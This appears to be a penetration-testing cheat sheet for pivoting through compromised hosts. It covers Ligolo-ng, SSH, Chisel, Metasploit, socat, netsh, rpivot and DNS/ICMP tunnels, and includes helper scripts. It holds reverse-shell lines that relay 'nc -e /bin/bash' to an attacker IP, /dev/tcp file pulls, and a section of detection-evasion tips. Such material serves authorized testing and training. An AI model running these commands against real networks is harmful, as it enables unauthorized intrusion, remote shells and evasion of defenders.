Pivoting & Tunneling Establish network tunnels and SOCKS proxies to access internal networks through compromised hosts. Essential for lateral movement when target networks are segmented and not directly accessible from the attacker machine.
Ligolo-ng
Setup Ligolo Interface (Attacker)
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
ip addr show ligolo
Start Ligolo Proxy (Attacker)
./proxy -selfcert -laddr 0.0.0.0:11601
./proxy -autocert -laddr 0.0.0.0:11601
openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 365 -subj "/CN=ligolo"
./proxy -laddr 0.0.0.0:11601 -certfile cert.pem -keyfile key.pem
-selfcert generates a throwaway certificate, so the agent has to be told to accept it (see -ignore-cert below). -autocert obtains a Let's Encrypt certificate, which needs a public DNS name for the proxy and inbound reachability for the ACME challenge. The openssl variant lets you reuse one certificate (and pin it on the agent side) across sessions.
Transfer and Run Agent (Target)
scp -i key agent root@10.10.10.10:/tmp/agent
./agent -connect 10.10.14.5:11601 -ignore-cert
ssh -i key root@10.10.10.10 "nohup /tmp/agent -connect 10.10.14.5:11601 -ignore-cert > /dev/null 2>&1 &"
The agent does not need root; every interface and route change happens on the attacker side. The nohup form keeps the agent alive after the SSH session ends (the path is /tmp/agent because that is where scp put it).
Route Traffic Through Agent (Attacker)
session
ifconfig
sudo ip route add 172.16.5.0/24 dev ligolo
start
In the proxy console, session selects the connected agent and ifconfig lists the agent's interfaces, which tells you which networks to route. The ip route command runs in a second terminal on the attacker, not in the proxy. start then binds the tunnel to the ligolo interface; nothing flows until it is run. On ligolo-ng 0.6 and later the command is tunnel_start --tun ligolo, and routes can also be added from the proxy with route_add --name ligolo --route 172.16.5.0/24.
Auto-Routing
autoroute
Newer releases provide autoroute in the proxy console: it lists the networks seen on the agent and creates the interface and routes for the ones you select, replacing the manual ip route steps.
Port Forwarding with Ligolo
Forward for File Transfers
listener_add --addr 0.0.0.0:1337 --to 10.10.14.5:8000 --tcp
python3 -m http.server 8000
wget http://172.16.5.10:1337/file.txt
listener_add runs in the proxy console with the agent's session selected. It opens port 1337 on the agent (172.16.5.10) and relays every connection back to --to, which is resolved from the proxy host, so 127.0.0.1:8000 works as well. The http.server runs on the attacker; the wget runs on an internal host that can reach the agent but not the attacker.
Forward for Reverse Shells
listener_add --addr 0.0.0.0:8443 --to 10.10.14.5:4444 --tcp
nc -lvnp 4444
nc 172.16.5.10 8443 -e /bin/bash
The nc listener on the attacker receives shells from hosts two hops away that connect to the agent's port 8443. -e needs a netcat build that supports it; use a bash or python reverse shell otherwise.
List and Delete Listeners
listener_list
listener_del --id 0
The id comes from listener_list; listeners are per agent session.
Access Local Services on the Agent (127.0.0.1)
sudo ip route add 240.0.0.1/32 dev ligolo
nmap 240.0.0.1
Ligolo-ng maps the reserved 240.0.0.0/4 range to the agent's loopback, so 240.0.0.1 reaches services the pivot host binds to 127.0.0.1 only (databases, admin panels, local proxies).
Double Pivot (Pivot through Pivot)
Setup Second Tunnel Interface (Attacker)
sudo ip tuntap add user $USER mode tun ligolo-double
sudo ip link set ligolo-double up
Forward Ligolo Traffic Through First Pivot (proxy console, first agent's session)
listener_add --addr 172.16.5.10:11601 --to 10.10.14.5:11601 --tcp
Connect Second Agent (on a host in 172.16.5.0/24)
./agent -connect 172.16.5.10:11601 -ignore-cert
Route to Third Network
session
ifconfig
sudo ip route add 172.16.3.0/24 dev ligolo-double
start --tun ligolo-double
The second agent dials the first agent's internal address on 11601, which the listener relays to the proxy. Select the second agent's session before running ifconfig and start: each agent gets its own tun interface, and routes for the networks behind that agent go on that interface. (ligolo-ng 0.6+: tunnel_start --tun ligolo-double.)
Troubleshooting Ligolo
Delete Problematic Routes
route_del
sudo ip route del 172.16.5.0/24 dev ligolo
Delete Interface
sudo ip link delete ligolo
sudo ip link delete ligolo-double
Fix "File Already Exists" Error
sudo ip route show
sudo ip route del 172.16.5.0/24
"RTNETLINK answers: File exists" means the route is already in the kernel table, usually left over from an earlier session or pointing at a different interface. List the table, delete the stale entry, then add the route again and re-run start.
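The interface and route steps above are easy to leave half-done: interface created but never brought up, a route added twice, or a route still pointing at the interface of a previous session. The script below is an added example, not part of Ligolo-ng or of this page's original commands; it wraps those steps so they can be re-run safely and takes CIDR/interface pairs so a double pivot is handled the same way. The file name, the argument layout and the decision to refuse (rather than overwrite) a route that already exists on another device are this example's own choices.

```shell
#!/usr/bin/env bash
# ligolo-routes.sh: attacker-side helper for the Ligolo-ng steps above.
# Added example; it is not part of Ligolo-ng. It creates the tun interface
# only if missing, adds each route only if absent, and refuses to re-add a
# route that already points at a different device (the usual cause of
# "RTNETLINK answers: File exists"). Pairs of CIDR IFACE cover a double pivot.
#
# Usage: ./ligolo-routes.sh up   172.16.5.0/24 ligolo 172.16.3.0/24 ligolo-double
#        ./ligolo-routes.sh down 172.16.5.0/24 ligolo 172.16.3.0/24 ligolo-double
set -eu

# route_device CIDR [ROUTE_TABLE]: print the device the kernel currently
# routes CIDR through, or nothing if there is no such route. ROUTE_TABLE
# defaults to the live `ip route show`; tests pass captured output instead.
# `ip` prints host routes without "/32", so that suffix is dropped first.
route_device() {
    local cidr=$1 table=${2-}
    [ -n "$table" ] || table=$(ip route show)
    printf '%s\n' "$table" | awk -v c="$cidr" '
        BEGIN { sub(/\/32$/, "", c) }
        $1 == c { for (i = 2; i < NF; i++) if ($i == "dev") { print $(i + 1); exit } }'
}

# tun_exists IFACE: 0 if the interface is present.
tun_exists() { ip link show "$1" >/dev/null 2>&1; }

# ensure_tun IFACE: create the tun device for the current user if needed and
# bring it up (both are no-ops when already done).
ensure_tun() {
    local iface=$1
    if ! tun_exists "$iface"; then
        sudo ip tuntap add user "$USER" mode tun "$iface"
    fi
    sudo ip link set "$iface" up
}

# ensure_route CIDR IFACE: add the route once. A route for CIDR through some
# other device is an error rather than silently clobbered, because it is
# usually a leftover from an earlier session that should be removed on purpose.
ensure_route() {
    local cidr=$1 iface=$2 dev
    dev=$(route_device "$cidr")
    if [ -z "$dev" ]; then
        sudo ip route add "$cidr" dev "$iface"
    elif [ "$dev" = "$iface" ]; then
        echo "route $cidr already on $iface, skipping"
    else
        echo "route $cidr already on $dev, not $iface: run 'sudo ip route del $cidr' first" >&2
        return 1
    fi
}

# remove_route CIDR IFACE / remove_tun IFACE: teardown; ignore what is absent.
remove_route() { [ "$(route_device "$1")" = "$2" ] && sudo ip route del "$1" dev "$2" || true; }
remove_tun()   { tun_exists "$1" && sudo ip link delete "$1" || true; }

main() {
    local action=$1; shift
    [ $# -ge 2 ] && [ $(($# % 2)) -eq 0 ] || { echo "usage: $0 up|down CIDR IFACE [CIDR IFACE ...]" >&2; return 2; }
    while [ $# -ge 2 ]; do
        case "$action" in
            up)   ensure_tun "$2"; ensure_route "$1" "$2" ;;
            down) remove_route "$1" "$2"; remove_tun "$2" ;;
        esac
        shift 2
    done
    if [ "$action" = up ]; then
        echo "routes in place; now run 'start' in the proxy (tunnel_start --tun IFACE on ligolo-ng 0.6+)"
    fi
}

# Only act when invoked with a verb, so the functions can also be sourced.
case "${1-}" in up|down) main "$@" ;; esac
```

After up, the proxy-side start (or tunnel_start) is still a manual step; the script deliberately stops short of that because the proxy console is interactive. down removes only routes that still point at the named interface, so it will not delete a route some other tool owns.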
SSH Tunneling
Dynamic Port Forwarding (SOCKS Proxy)
ssh -D 1080 user@10.10.10.10
ssh -N -D 1080 user@10.10.10.10
ssh -f -N -D 1080 user@10.10.10.10
-N opens no remote shell and -f backgrounds ssh once the tunnel is up. The SOCKS port binds to 127.0.0.1 by default; bind 0.0.0.0 only when other hosts genuinely need the proxy, because there is no authentication on it.
Use with Proxychains
sudo nano /etc/proxychains4.conf
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 172.16.5.10
proxychains curl http://172.16.5.10
nmap must use a full connect scan (-sT) through a SOCKS proxy; SYN scans and ICMP host discovery do not traverse it, hence -Pn.
Local Port Forwarding
ssh -L 8080:172.16.5.10:80 user@10.10.10.10
curl http://127.0.0.1:8080
ssh -L 9090:172.16.5.20:3389 user@10.10.10.10
A port on the attacker is relayed by the SSH server to the internal host:port, so 127.0.0.1:9090 becomes the RDP service on 172.16.5.20.
Remote Port Forwarding
ssh -R 8080:127.0.0.1:80 user@10.10.10.10
ssh -R 4444:127.0.0.1:4444 user@10.10.10.10
The SSH server starts listening on the given port and relays back to a service on the attacker (a web server for payload delivery, an nc listener for shells). sshd binds that port to its loopback unless GatewayPorts is enabled, so internal hosts can only reach it if the pivot forwards it further (socat, netsh).
SSH Tunnel Combinations
ssh -L 8080:172.16.5.10:80 -L 3389:172.16.5.20:3389 user@10.10.10.10
ssh -D 1080 -L 8080:172.16.5.10:80 user@10.10.10.10
ssh -o ServerAliveInterval=60 -D 1080 user@10.10.10.10
Any number of -L, -R and -D options can share one session. ServerAliveInterval keeps idle tunnels from being dropped by NAT or firewall state timeouts.
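The dynamic forward above is usually run by hand and then checked by trial and error with proxychains. The wrapper below is an added example, not part of OpenSSH, proxychains or this page's original commands: it starts the SOCKS tunnel under an SSH control socket so it can be closed cleanly, waits until the SOCKS port is actually listening before declaring success, and writes a per-engagement proxychains config rather than editing the system file. The ~/.pivot paths, the ss-based port check and the socks4/socks5-only config writer are this example's assumptions.

```shell
#!/usr/bin/env bash
# socks-tunnel.sh: wrapper for the SSH dynamic forward above. Added example,
# not part of OpenSSH or proxychains. It starts the SOCKS tunnel in the
# background under an SSH control socket (so "down" can close it cleanly),
# waits until the SOCKS port is actually listening, and writes a dedicated
# proxychains config instead of editing /etc/proxychains4.conf by hand.
# Paths under ~/.pivot and the port check via `ss` are this script's choices.
#
# Usage: ./socks-tunnel.sh up   user@10.10.10.10 1080
#        proxychains4 -f ~/.pivot/proxychains.conf nmap -sT -Pn 172.16.5.10
#        ./socks-tunnel.sh down user@10.10.10.10
set -eu

PIVOT_DIR=${PIVOT_DIR:-"${HOME:-/tmp}/.pivot"}
CTL="$PIVOT_DIR/ctl"
CONF="$PIVOT_DIR/proxychains.conf"

# write_proxychains_conf FILE PORT VERSION: VERSION is socks5 for ssh -D,
# chisel and Metasploit's socks_proxy, socks4 for rpivot. proxy_dns keeps
# name lookups inside the tunnel (socks4 cannot carry hostnames, so target
# IPs there); quiet_mode silences the per-connection banner.
write_proxychains_conf() {
    local file=$1 port=$2 version=$3
    case "$version" in
        socks4|socks5) ;;
        *) echo "only socks4/socks5 handled here, got: $version" >&2; return 2 ;;
    esac
    mkdir -p "$(dirname "$file")"
    cat > "$file" <<EOF
strict_chain
proxy_dns
quiet_mode
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
$version 127.0.0.1 $port
EOF
}

# port_listening PORT [SS_OUTPUT]: 0 when some TCP socket is in LISTEN state
# on PORT. SS_OUTPUT defaults to live `ss -ltn`; tests pass captured output.
port_listening() {
    local port=$1 out=${2-}
    [ -n "$out" ] || out=$(ss -ltn)
    printf '%s\n' "$out" | awk -v p="$port" '
        $1 == "LISTEN" { n = split($4, a, ":"); if (a[n] == p) found = 1 }
        END { exit !found }'
}

# wait_for_port PORT SECONDS: poll once a second until the port is up.
wait_for_port() {
    local port=$1 tries=$2
    while [ "$tries" -gt 0 ]; do
        port_listening "$port" && return 0
        tries=$((tries - 1))
        sleep 1
    done
    return 1
}

up() {
    local target=$1 port=${2:-1080}
    mkdir -p "$PIVOT_DIR"
    # -f -N: background, no remote command. -M -S: master control socket.
    # -D 127.0.0.1:PORT binds loopback only. ExitOnForwardFailure makes ssh
    # fail loudly instead of running with no forward when the port is taken.
    ssh -f -N -M -S "$CTL" -o ExitOnForwardFailure=yes -o ServerAliveInterval=60 \
        -D "127.0.0.1:$port" "$target"
    if ! wait_for_port "$port" 10; then
        echo "SOCKS port $port never came up, closing tunnel" >&2
        down "$target"
        return 1
    fi
    write_proxychains_conf "$CONF" "$port" socks5
    echo "tunnel up: proxychains4 -f $CONF <command>"
}

# down TARGET: ask the master connection to exit (closes all its forwards).
down() { [ -S "$CTL" ] && ssh -S "$CTL" -O exit "$1" || true; }

case "${1-}" in up|down) verb=$1; shift; "$verb" "$@" ;; esac
```

Because the tunnel runs under a control socket, a second ssh -S ~/.pivot/ctl -O forward -L ... can add forwards to the same session later without re-authenticating, and down tears everything out in one step instead of hunting for the backgrounded ssh process.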
Chisel
Installation and Compilation
git clone https://github.com/jpillora/chisel.git
cd chisel
go build
go build -ldflags="-s -w"
upx --brute chisel
-s -w strips symbols and debug information; upx compresses the result further for transfer. Set the GOOS and GOARCH environment variables to cross-compile a binary for Windows targets.
Transfer Chisel
cat chisel | nc -lvnp 9001
cat < /dev/tcp/10.10.14.5/9001 > chisel
chmod +x chisel
python3 -m http.server 8000
wget http://10.10.14.5:8000/chisel
The first pair is nc on the attacker feeding the file to a bash /dev/tcp redirection on the target (no wget or curl required); the http.server pair is the alternative when they are available.
Forward Pivot (Target as Server)
Start Server on Target
./chisel server -p 9001 --socks5
Connect Client from Attacker
./chisel client 10.10.10.10:9001 socks
Opens a SOCKS5 proxy on the attacker's 127.0.0.1:1080 whose connections leave from the target. This needs an inbound path to the target's port 9001.
Reverse Pivot (Attacker as Server)
Start Server on Attacker
./chisel server --reverse -p 1234 --socks5
Connect Client from Target
./chisel client 10.10.14.5:1234 R:socks
The target dials out, so this works through firewalls that allow only outbound connections; the SOCKS5 proxy again appears on the attacker's 127.0.0.1:1080. As written the server accepts any client: use chisel's --auth option on both ends, otherwise anyone who can reach port 1234 can push their own reverse tunnels through your machine.
Use with Proxychains
sudo nano /etc/proxychains4.conf
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 172.16.5.10
Chisel Port Forwarding
Local Port Forward
./chisel client 10.10.10.10:9001 8080:172.16.5.10:80
curl http://127.0.0.1:8080
Remote Port Forward
./chisel server --reverse -p 1234
./chisel client 10.10.14.5:1234 R:9090:127.0.0.1:8080
Local forward: the attacker's 8080 is relayed through the chisel server on the target to 172.16.5.10:80. Remote forward: the attacker's server listens on 9090 and relays into the target's 127.0.0.1:8080, the chisel equivalent of ssh -R.
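The reverse pivot above is the one most often left exposed: the server takes any client, and the client trusts whatever key the server presents. The script below is an added example, not part of chisel or of this page's original commands. It generates a one-off --auth credential, starts the reverse SOCKS server, reads the key fingerprint chisel logs at startup, and prints the exact client line to run on the target with that fingerprint pinned. It assumes a chisel binary in $PATH on the attacker; the log format it parses is chisel's "server: Fingerprint ..." startup line.

```shell
#!/usr/bin/env bash
# chisel-reverse.sh: hardened form of the reverse pivot above. Added example,
# not part of chisel. The page's commands accept any client on the server
# and trust any server key on the client; this wrapper generates a one-off
# --auth credential, starts the reverse SOCKS server, reads the key
# fingerprint chisel logs at startup, and prints the exact client line to run
# on the target with that fingerprint pinned. Assumes a chisel binary in
# $PATH on the attacker; the target needs the same binary.
#
# Usage: ./chisel-reverse.sh 1234 10.10.14.5
set -eu

# new_auth [USER]: random "user:password" for chisel --auth; the password is
# 24 hex characters from /dev/urandom.
new_auth() {
    local user=${1:-pivot} pass
    pass=$(od -An -N12 -tx1 /dev/urandom | tr -d ' \n')
    printf '%s:%s\n' "$user" "$pass"
}

# fingerprint_from_log LOGTEXT: chisel prints "server: Fingerprint <b64>"
# once at startup; return that value (empty if not logged yet).
fingerprint_from_log() {
    printf '%s\n' "$1" | awk '/Fingerprint/ { print $NF; exit }'
}

# client_cmd ATTACKER_IP PORT AUTH FINGERPRINT: the target-side command.
# --fingerprint makes the client refuse any server whose key differs, so a
# hijacked DNS name or an intercepted connection cannot harvest the
# credential or hand the target a fake pivot.
client_cmd() {
    printf 'chisel client --auth %s --fingerprint %s %s:%s R:socks\n' "$3" "$4" "$1" "$2"
}

main() {
    local port=$1 ip=$2 auth log fp i
    auth=$(new_auth)
    log=$(mktemp)
    # Reverse server with SOCKS5; R:socks from the client lands on the
    # attacker's 127.0.0.1:1080 (chisel's default), not on 0.0.0.0.
    chisel server --reverse -p "$port" --socks5 --auth "$auth" >"$log" 2>&1 &
    echo "chisel server pid $!, log $log"
    fp=""
    for i in 1 2 3 4 5; do
        fp=$(fingerprint_from_log "$(cat "$log")")
        [ -n "$fp" ] && break
        sleep 1
    done
    [ -n "$fp" ] || { echo "server did not log a fingerprint; see $log" >&2; return 1; }
    echo "run on target:"
    client_cmd "$ip" "$port" "$auth" "$fp"
    echo "then on attacker: proxychains4 <command>   (socks5 127.0.0.1 1080)"
}

# Only start a server when called with PORT and ATTACKER_IP.
case $# in 2) main "$@" ;; esac
```

The credential travels to the target inside the command line, so paste it over the channel you already trust (the existing shell), and rotate it per engagement; the fingerprint changes every time the server starts unless chisel is given a fixed key, so re-run the script rather than reusing an old client line.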
Metasploit Pivoting
Autoroute
meterpreter> run autoroute -s 172.16.5.0/24
meterpreter> run autoroute -p
use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.5.10
run
Once a route exists for 172.16.5.0/24 via the Meterpreter session, every framework module that targets that range is carried through the session automatically; the scanner module itself has no SESSION option, the routing table does the work. The same route can also be added from msfconsole with the route command, naming the session id.
Port Forwarding
meterpreter> portfwd add -l 3389 -p 3389 -r 172.16.5.10
meterpreter> portfwd list
meterpreter> portfwd delete -l 3389
Connect to 127.0.0.1:3389 on the attacker to reach RDP on 172.16.5.10 (not limited to Metasploit; any client works).
SOCKS Proxy
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
set VERSION 5
run -j
proxychains nmap -sT -Pn 172.16.5.10
The SOCKS server reaches internal hosts only for ranges that have a Metasploit route, so run autoroute first. -j runs the module as a background job so the console stays usable.
Socat
Port Forwarding
socat TCP-LISTEN:8080,fork TCP:172.16.5.10:80
socat TCP-LISTEN:4444 TCP:172.16.5.10:4444
Runs on the pivot host. fork serves multiple clients; without it socat exits after the first connection closes, which is fine for a one-shot relay.
Reverse Shell Relay
socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444
nc -lvnp 4444
nc 172.16.5.10 4444 -e /bin/bash
socat on the pivot (172.16.5.10) relays the internal host's shell to the nc listener on the attacker.
Netsh (Windows) Port Forwarding
# Add port forward
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.5.10
# List forwards
netsh interface portproxy show all
# Delete forward
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
Needs an administrative shell and the IP Helper service. The forward is persistent until deleted, and Windows Firewall may still block the listening port until a rule is added (netsh advfirewall).
Rpivot (Reverse SOCKS)
Server on Attacker
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
Client on Target
python client.py --server-ip 10.10.14.5 --server-port 9999
Use with Proxychains
socks4 127.0.0.1 1080
proxychains nmap -sT -Pn 172.16.5.10
rpivot is a Python 2 tool and speaks SOCKS4 only, so hostnames cannot be resolved through the tunnel: target IP addresses with proxychains.
DNS Tunneling
Dnscat2
Server (Attacker)
ruby dnscat2.rb --dns domain=tunnel.com --secret=password
Client (Target)
./dnscat tunnel.com --secret=password
Requires tunnel.com's NS record to be delegated to the attacker's server so recursive resolvers forward the queries there. --secret authenticates both ends; without it anyone who finds the domain can attach to the session.
Iodine
Server (Attacker)
sudo iodined -f -c -P password 10.0.0.1 tunnel.com
Client (Target)
sudo iodine -f -P password tunnel.com
iodine provides a full IP tunnel (10.0.0.1 on the server side, the next address handed to the client), so ordinary tools work across it; both ends need root for the tun device, and the same NS delegation applies.
ICMP Tunneling
Ptunnel
Server (Attacker)
sudo ptunnel -x password
Client (Target)
sudo ptunnel -p 10.10.14.5 -lp 8000 -da 172.16.5.10 -dp 80 -x password
The client listens on local port 8000 and carries that traffic in ICMP echo requests to the proxy at 10.10.14.5, which opens the TCP connection to 172.16.5.10:80. Note the direction: the proxy end makes the outbound connection, so to reach an internal network the proxy has to run on the pivot host. Both ends need raw-socket (root) privileges, and the client must be able to ping the proxy.
Notes
Ligolo-ng Advantages:
Fast and efficient
Multiple pivots support
Easy port forwarding
Auto-routing feature
Minimal setup required
SSH Tunneling:
Native on Linux (the OpenSSH client also ships with Windows 10+ and macOS)
Encrypted by default
Dynamic (SOCKS) and static (port forward) options
Requires SSH access
Can be slow for large data transfers
Chisel:
Cross-platform (Windows, Linux, macOS)
Single binary
Reverse pivot support
SOCKS5 proxy
Can be compressed to small size
Metasploit Pivoting:
Integrated with Metasploit framework
Autoroute for easy routing
SOCKS proxy support
Port forwarding
Requires Meterpreter session
Tool Selection:
Ligolo-ng - Best overall, fast, feature-rich
SSH - When SSH access available, encrypted
Chisel - Cross-platform, firewall-friendly
Metasploit - When using Metasploit framework
Socat - Simple port forwarding
DNS/ICMP - When other protocols blocked
Proxychains Configuration:
Edit /etc/proxychains4.conf or /etc/proxychains.conf
Use socks5 for SOCKS5 proxies
Use socks4 for SOCKS4 proxies
Chain multiple proxies if needed
Use -q flag for quiet mode
Common Pitfalls:
Forgetting to add routes
Wrong SOCKS version in proxychains
Firewall blocking pivot traffic
Not starting tunnel after adding routes
Conflicting port forwards
Exposing a SOCKS proxy or a chisel/ligolo listener on 0.0.0.0 without authentication, which hands the pivot to anyone who can reach the port
Running the ligolo agent with -ignore-cert on an untrusted path; it will connect to anything presenting a certificate, so pin the proxy's certificate with the agent's -accept-fingerprint option instead
Leaving agents, routes and tun interfaces behind after the engagement
Performance Considerations:
SSH tunneling can be slow
Ligolo-ng is usually the fastest: it tunnels raw IP packets over one multiplexed connection instead of proxying each TCP connection through SOCKS
DNS tunneling is very slow
ICMP tunneling is slow
Consider bandwidth when choosing tool
Detection Evasion:
DNS tunneling hides among normal DNS traffic, but its query volume and long, high-entropy subdomains are easy to flag
ICMP tunneling rides in echo request/reply payloads; oversized or high-rate pings stand out
SSH tunneling is encrypted, but a long-lived SSH session to an unusual host is still visible in flow data
Chisel can use HTTP/HTTPS, so it passes web proxies and blends with browser traffic
Avoid obvious port numbers (4444, 1080) on anything that listens
Troubleshooting:
Verify routes with ip route show
Check firewall rules
Test connectivity with nmap -sT or curl through the proxy (ping does not traverse SOCKS)
Verify proxy is listening
Check proxychains configuration
Use verbose mode for debugging